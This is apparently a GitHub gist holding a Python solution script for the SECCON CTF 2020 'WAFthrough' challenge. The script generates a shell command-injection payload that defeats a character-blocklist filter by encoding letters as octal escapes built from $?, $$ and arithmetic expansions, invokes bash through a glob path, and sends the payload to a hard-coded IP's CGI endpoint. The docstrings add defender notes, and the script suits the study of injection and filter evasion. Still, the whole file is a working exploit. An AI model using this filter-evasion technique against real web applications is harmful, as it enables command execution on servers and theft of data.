
@icchy
Created October 11, 2020 06:30
SECCON CTF 2020 - WAFthrough
from urllib.request import urlopen
from urllib import request
import string
def escape(val):
    r"""Wrap *val* as a shell ANSI-C quoted word with a doubled backslash.

    The result is the text ``$'\\`` + *val* + ``'``; for example
    ``escape("101")`` gives ``$'\\101'``. *val* is inserted with
    ``str.format``, so non-string values are stringified.

    Nothing else in the visible script calls this helper.
    """
    template = "$'\\\\{}'"
    return template.format(val)
# Letters that gen_lit has already emitted verbatim; each is allowed through
# unencoded only once, so this list makes gen_lit stateful across calls.
used = []


def gen_lit(c):
    r"""Return the text that stands for character *c* in the generated payload.

    A letter is passed through unchanged only the first time it is requested
    and only when it is not in the hard-coded set
    ``usrbinflagUSRBINFLAG1234567890vwxyz cpth`` (presumably the characters
    the challenge's filter rejects -- the page does not say). Everything else,
    including a repeat of a letter already emitted, is written as two
    backslashes followed by its octal code, with every octal digit spelled as
    a shell expansion rather than as a digit:

        0 -> $?                    relies on the last exit status being 0
        1 -> $((_**_))             is 1 provided `_` evaluates to 0 or 1
        n -> $((($$+...+$$)/$$))   n copies of $$, i.e. n * PID / PID

    Side effect: appends *c* to the module-level ``used`` list when the
    character is returned verbatim, so results depend on call order.

    Defender note: the encoded form contains no digits and none of the listed
    letters, so a filter that only blocklists characters never sees the word
    being spelled. The control that holds is keeping request data out of shell
    evaluation, or allowlisting the expected input.
    """
    passes_verbatim = (
        c not in used
        and c not in 'usrbinflagUSRBINFLAG1234567890vwxyz cpth'
        and c in string.ascii_letters
    )
    if passes_verbatim:
        used.append(c)
        return c

    pieces = []
    # oct() yields e.g. '0o146'; drop the '0o' prefix and encode digit by digit.
    for digit in oct(ord(c))[2:]:
        value = int(digit)
        if value == 0:
            pieces.append('$?')
        elif value == 1:
            pieces.append('$((_**_))')
        else:
            pieces.append('$((({})/$$))'.format('+'.join(['$$'] * value)))
    return "\\\\" + ''.join(pieces)
def gen_payload(payload):
    """Encode *payload* and place it in the script's fixed shell template.

    Each character is converted by ``gen_lit`` in order, and the joined result
    replaces ``{}`` in ``/???/[^c-~]?[p-t]h<<<"$'{}'|od"``. The template
    starts with a glob instead of a literal path (it presumably matches
    /bin/bash -- confirm against the target filesystem) and feeds that program
    the here-string ``$'<encoded>'|od``.

    Because ``gen_lit`` records letters it has emitted verbatim in the
    module-level ``used`` list, calling this twice with the same input can
    produce different output.
    """
    encoded = ''.join(gen_lit(ch) for ch in payload)
    template = '/???/[^c-~]?[p-t]h<<<"$\'{}\'|od"'
    return template.format(encoded)
# Build the payload for the literal word 'flag'. All four letters are in
# gen_lit's always-encode set, so none of them appears verbatim in the output.
payload = gen_payload('flag')
print(payload, len(payload), sep='\n')

# The payload is placed, without URL-encoding, inside `_[$( ... )]` in the `_`
# query parameter of the challenge's CGI endpoint, and the response is printed.
# Defender view: server-side this is a GET to /cgi-bin/index.cgi whose `_`
# value contains `$(`, `<<<`, `$$` and `|`. An allowlist of the characters the
# parameter is expected to hold would reject it.
url = 'http://153.120.168.36/cgi-bin/index.cgi?_=_[$({})]'.format(payload)
res = urlopen(url)
print(res.read().decode())